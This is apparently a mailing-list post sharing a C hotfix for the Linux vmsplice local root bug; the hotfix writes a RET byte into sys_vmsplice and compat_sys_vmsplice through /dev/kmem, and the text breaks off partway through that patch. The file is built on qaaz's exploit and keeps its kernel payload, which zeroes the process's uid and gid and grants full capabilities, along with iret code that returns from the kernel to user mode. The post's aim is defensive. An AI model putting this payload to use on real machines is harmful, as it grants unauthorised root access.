I modified the hotfix so that it also patches compat_sys_vmsplice, which
is important on amd64 boxen with 32-bit x86 compatibility enabled.
It's attached, or if for some reason it doesn't make it through, you can
fetch it from
http://www.andrew.cmu.edu/~aij/disable-vmsplice-if-exploitable-aij.c
Ivan

/*
* Linux vmsplice Local Root Exploit
* By qaaz
*
* Linux 2.6.17 - 2.6.24.1
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <malloc.h>
#include <limits.h>
#include <signal.h>
#include <unistd.h>
#include <sys/uio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <asm/page.h>
#define __KERNEL__
#include <asm/unistd.h>

#define PIPE_BUFFERS    16
#define PG_compound     14
#define uint            unsigned int
#define static_inline   static inline __attribute__((always_inline))
#define STACK(x)        (x + sizeof(x) - 40)
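/*
 * Userspace copy of the 2.6 kernel's struct page layout, kept from the
 * original exploit: the exploit forges pages with PG_compound set so that
 * the kernel ends up calling kernel_code() below when it drops them.
 */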
struct page {
    unsigned long flags;
    int count;
    int mapcount;
    unsigned long private;
    void *mapping;
    unsigned long index;
    struct { long next, prev; } lru;
};
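/*
 * exit_code() runs in user mode once the kernel payload returns;
 * exit_stack is the user-mode stack that exit_kernel() switches onto
 * (STACK() points the new stack pointer near its top).
 */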
void exit_code();
char exit_stack[1024 * 1024];

void die(char *msg, int err)
{
    printf(err ? "[-] %s: %s\n" : "[-] %s\n", msg, strerror(err));
    fflush(stdout);
    fflush(stderr);
    exit(1);
}
#if defined (__i386__)
#ifndef __NR_vmsplice
#define __NR_vmsplice 316
#endif
#define USER_CS 0x73
#define USER_SS 0x7b
#define USER_FL 0x246
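/*
 * USER_CS/USER_SS are the i386 user-mode code/data segment selectors and
 * USER_FL a sane EFLAGS value (IF set); exit_kernel() writes them into an
 * iret frame on the kernel stack and "returns" to exit_code() in ring 3.
 */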
static_inline
void exit_kernel()
{
    __asm__ __volatile__ (
        "movl %0, 0x10(%%esp) ;"
        "movl %1, 0x0c(%%esp) ;"
        "movl %2, 0x08(%%esp) ;"
        "movl %3, 0x04(%%esp) ;"
        "movl %4, 0x00(%%esp) ;"
        "iret"
        : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
            "i" (USER_CS), "r" (exit_code)
    );
}
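/*
 * get_current(): on these kernels thread_info sits at the base of the 8 KB
 * kernel stack, so masking the stack pointer with ~8191 and dereferencing
 * its first field yields the current task_struct pointer.
 */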
static_inline
void *get_current()
{
    unsigned long curr;
    __asm__ __volatile__ (
        "movl %%esp, %%eax ;"
        "andl %1, %%eax ;"
        "movl (%%eax), %0"
        : "=r" (curr)
        : "i" (~8191)
    );
    return (void *) curr;
}
#elif defined (__x86_64__)
#ifndef __NR_vmsplice
#define __NR_vmsplice 278
#endif
#define USER_CS 0x23
#define USER_SS 0x2b
#define USER_FL 0x246
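/*
 * x86_64 variant of the same trick: swapgs restores the user GS base, then
 * an iretq frame (SS, RSP, RFLAGS, CS, RIP) is built on the kernel stack to
 * drop back to exit_code() in user mode.
 */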
static_inline
void exit_kernel()
{
    __asm__ __volatile__ (
        "swapgs ;"
        "movq %0, 0x20(%%rsp) ;"
        "movq %1, 0x18(%%rsp) ;"
        "movq %2, 0x10(%%rsp) ;"
        "movq %3, 0x08(%%rsp) ;"
        "movq %4, 0x00(%%rsp) ;"
        "iretq"
        : : "i" (USER_SS), "r" (STACK(exit_stack)), "i" (USER_FL),
            "i" (USER_CS), "r" (exit_code)
    );
}
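/*
 * On these x86_64 kernels %gs points at the per-CPU PDA, whose first field
 * is the current task pointer, so a single load fetches task_struct.
 */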
static_inline
void *get_current()
{
    unsigned long curr;
    __asm__ __volatile__ (
        "movq %%gs:(0), %0"
        : "=r" (curr)
    );
    return (void *) curr;
}
#else
#error "unsupported arch"
#endif
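/*
 * vmsplice(2) wrapper: use the legacy _syscall4() macro when the kernel
 * headers still provide it, otherwise fall back to syscall(2).
 */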
#if defined (_syscall4)
#define __NR__vmsplice __NR_vmsplice
_syscall4(
    long, _vmsplice,
    int, fd,
    struct iovec *, iov,
    unsigned long, nr_segs,
    unsigned int, flags)
#else
#define _vmsplice(fd,io,nr,fl) syscall(__NR_vmsplice, (fd), (io), (nr), (fl))
#endif
static uint uid, gid;
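/*
 * Payload the exploit arranges to run in kernel mode: scan the current
 * task_struct for four copies of the uid followed by four of the gid (the
 * 2.6 credential layout), zero them all to become root, set the capability
 * words that follow to ~0, then return to user space via exit_kernel().
 */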
void kernel_code()
{
    int i;
    uint *p = get_current();

    for (i = 0; i < 1024-13; i++) {
        if (p[0] == uid && p[1] == uid &&
            p[2] == uid && p[3] == uid &&
            p[4] == gid && p[5] == gid &&
            p[6] == gid && p[7] == gid) {
            p[0] = p[1] = p[2] = p[3] = 0;
            p[4] = p[5] = p[6] = p[7] = 0;
            p = (uint *) ((char *)(p + 8) + sizeof(void *));
            p[0] = p[1] = p[2] = ~0;
            break;
        }
        p++;
    }

    exit_kernel();
}
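/*
 * The actual hotfix: look up sys_vmsplice (and, on 64-bit kernels,
 * compat_sys_vmsplice) in /proc/kallsyms, map the page containing each
 * handler through /dev/kmem, and overwrite its first byte with RET (0xC3),
 * effectively disabling the syscall until a fixed kernel is booted.
 */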
void de_exploit()
{
    char line[4096];
    FILE* ksyms = fopen("/proc/kallsyms", "r");
    size_t address = 0;
    size_t compat_address = 0;
    if(!ksyms)
    {
        perror("Could not open /proc/kallsyms");
        exit(EXIT_FAILURE);
    }
    while(fgets(line, sizeof(line), ksyms))
    {
        /* leading space so this does not also match compat_sys_vmsplice */
        if(strstr(line, " sys_vmsplice"))
        {
            sscanf(line, "%zx", &address);
        }
        if(strstr(line, "compat_sys_vmsplice"))
        {
            sscanf(line, "%zx", &compat_address);
        }
    }
    if(!address)
    {
        fprintf(stderr, "Address not found\n");
        exit(EXIT_FAILURE);
    }
    int fd = open("/dev/kmem", O_RDWR);
    if(fd == -1)
    {
        perror("open(\"/dev/kmem\")");
        exit(EXIT_FAILURE);
    }
    /* mmap lengths are rounded up to a full page, so the in-page offset
       written below is always inside the mapping */
    char* map = mmap(0, 0x20, PROT_READ | PROT_WRITE, MAP_SHARED, fd,
                     address & ~0xFFF);
    if(map == MAP_FAILED)
    {
        perror("mmap");
        exit(EXIT_FAILURE);
    }
    map[address & 0xfff] = 0xc3; /* 0xC3 = RET */
    if (compat_address) {
        printf("Patched sys_vmsplice, now patching compat_sys_vmsplice\n");
        char* map = mmap(0, 0x20, PROT_READ | PROT_WRITE, MAP_SHARED, fd,
                         compat_address & ~0xFFF);
        if(map == MAP_FAILED)
        {
            perror("mmap");
            exit(EXIT_FAILURE);
        }